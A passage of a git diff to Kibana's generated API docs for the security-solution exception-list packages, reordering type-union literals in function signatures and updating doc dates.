b/api_docs/kbn_securitysolution_list_api.devdocs.json 
@@ -62,7 +62,7 @@ "signature": [ "({ http, listItem, signal, }: ", "AddExceptionListItemProps", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: 
string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-api/src/api/index.ts", "deprecated": false, 
@@ -206,7 +206,7 @@ "signature": [ "({ http, id, namespaceType, signal, }: ", "ApiCallByIdProps", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: 
string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-api/src/api/index.ts", "deprecated": false, 
@@ -245,7 +245,7 @@ "section": "def-common.DeleteListParams", "text": "DeleteListParams" }, - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": "packages/kbn-securitysolution-list-api/src/list_api/index.ts", "deprecated": false, 
@@ -399,7 +399,7 @@ "signature": [ "({ http, id, namespaceType, signal, }: ", "ApiCallByIdProps", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: 
string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-api/src/api/index.ts", "deprecated": false, 
@@ -432,7 +432,7 @@ "signature": [ "({ filterOptions, http, listIds, namespaceTypes, pagination, signal, }: ", "ApiCallByListIdProps", - ") => Promise<{ data: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }>" + ") => Promise<{ data: { _version: string | undefined; comments: ({ comment: string; 
created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }[]; page: number; per_page: number; total: number; } & { pit?: string | undefined; }>" ], "path": "packages/kbn-securitysolution-list-api/src/api/index.ts", "deprecated": false, 
@@ -504,7 +504,7 @@ "section": "def-common.FindListsParams", "text": "FindListsParams" }, - ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" + ") => Promise<{ cursor: string; data: { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }[]; page: number; per_page: number; total: number; }>" ], "path": "packages/kbn-securitysolution-list-api/src/list_api/index.ts", "deprecated": false, 
@@ -549,7 +549,7 @@ "section": "def-common.ImportListParams", "text": "ImportListParams" }, - ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ") => Promise<{ _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" ], "path": "packages/kbn-securitysolution-list-api/src/list_api/index.ts", "deprecated": false, 
@@ -743,7 +743,7 @@ "signature": [ "({ http, listItem, signal, }: ", "UpdateExceptionListItemProps", - ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" + ") => Promise<{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: 
string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }>" ], "path": "packages/kbn-securitysolution-list-api/src/api/index.ts", "deprecated": false, 
@@ -1102,7 +1102,7 @@ "label": "type", "description": [], "signature": [ - "\"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined" + "\"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\" | undefined" ], "path": "packages/kbn-securitysolution-list-api/src/list_api/types.ts", "deprecated": false diff --git a/api_docs/kbn_securitysolution_list_api.mdx b/api_docs/kbn_securitysolution_list_api.mdx index 84d4ee2455e59..0ffa0a08cf9c5 100644 --- a/api_docs/kbn_securitysolution_list_api.mdx +++ b/api_docs/kbn_securitysolution_list_api.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-list-api title: "@kbn/securitysolution-list-api" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-list-api plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-list-api'] --- import kbnSecuritysolutionListApiObj from './kbn_securitysolution_list_api.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_list_constants.mdx b/api_docs/kbn_securitysolution_list_constants.mdx index 70f737432ea24..1f3274e940be4 100644 --- a/api_docs/kbn_securitysolution_list_constants.mdx +++ b/api_docs/kbn_securitysolution_list_constants.mdx 
@@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-securitysolution-list-constants title: "@kbn/securitysolution-list-constants" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/securitysolution-list-constants plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/securitysolution-list-constants'] --- import kbnSecuritysolutionListConstantsObj from './kbn_securitysolution_list_constants.devdocs.json'; diff --git a/api_docs/kbn_securitysolution_list_hooks.devdocs.json b/api_docs/kbn_securitysolution_list_hooks.devdocs.json index 1d24c2e9c357d..ad642ef094b12 100644 --- a/api_docs/kbn_securitysolution_list_hooks.devdocs.json +++ b/api_docs/kbn_securitysolution_list_hooks.devdocs.json 
@@ -29,7 +29,7 @@ "\nThis adds an id to the incoming exception item entries as ReactJS prefers to have\nan id added to them for use as a stable id. Later if we decide to change the data\nmodel to have id's within the array then this code should be removed. If not, then\nthis code should stay as an adapter for ReactJS.\n\nThis does break the type system slightly as we are lying a bit to the type system as we return\nthe same exceptionItem as we have previously but are augmenting the arrays with an id which TypeScript\ndoesn't mind us doing here. However, downstream you will notice that you have an id when the type\ndoes not indicate it. In that case use (ExceptionItem & { id: string }) temporarily if you're using the id. If you're not,\nyou can ignore the id and just use the normal TypeScript with ReactJS.\n" ], "signature": [ - "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; 
} | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; 
namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" + "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { 
updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, 
@@ -44,7 +44,7 @@ "The exceptionItem to add an id to the threat matches." ], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: 